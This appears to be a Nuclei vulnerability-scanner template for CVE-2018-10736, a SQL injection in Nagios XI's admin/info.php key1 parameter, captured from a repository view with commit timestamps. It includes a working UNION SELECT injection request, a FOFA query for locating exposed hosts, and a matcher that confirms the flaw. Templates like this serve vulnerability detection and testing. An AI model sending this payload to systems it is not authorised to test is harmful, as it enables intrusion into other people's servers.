2024-04-02 04:06:10 +00:00
|
|
|
id: CVE-2018-10736
|
|
|
|
|
|
|
|
info:
|
2024-04-03 04:23:54 +00:00
|
|
|
name: NagiosXI <= 5.4.12 - SQL injection
|
2024-04-02 04:06:10 +00:00
|
|
|
author: DhiyaneshDK
|
|
|
|
severity: high
|
|
|
|
description: |
|
|
|
|
A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/info.php key1 parameter.
|
|
|
|
reference:
|
|
|
|
- https://github.com/0ps/pocassistdb
|
|
|
|
- https://github.com/jweny/pocassistdb
|
|
|
|
- https://vulners.com/seebug/SSV:97266
|
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
|
|
|
cvss-score: 7.2
|
|
|
|
cve-id: CVE-2018-10736
|
|
|
|
cwe-id: CWE-89
|
|
|
|
epss-score: 0.00403
|
|
|
|
epss-percentile: 0.7323
|
|
|
|
cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*
|
|
|
|
metadata:
|
|
|
|
verified: true
|
|
|
|
max-request: 1
|
|
|
|
vendor: nagios
|
|
|
|
product: nagios_xi
|
|
|
|
fofa-query: app="Nagios-XI"
|
|
|
|
tags: cve,cve2018,nagios,sqli
|
|
|
|
|
|
|
|
variables:
|
|
|
|
num: "{{rand_int(2000000000, 2100000000)}}"
|
|
|
|
|
|
|
|
http:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/nagiosql/admin/info.php?key1=%27%20union%20select%20concat(md5({{num}}))%23"
|
|
|
|
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- "{{md5(num)}}"
|
2024-04-03 04:29:20 +00:00
|
|
|
# digest: 4b0a0048304602210096f6d47bc3a2fd2ff957df8bdb5367c2223cc113bd088a105e29d264e9bc7de102210090f4905b4787b7185c8c9495b3de6a65eb1aa90ca66a3e97e77904bdc1d13a09:922c64590222798bb761d5b6d8e72950
|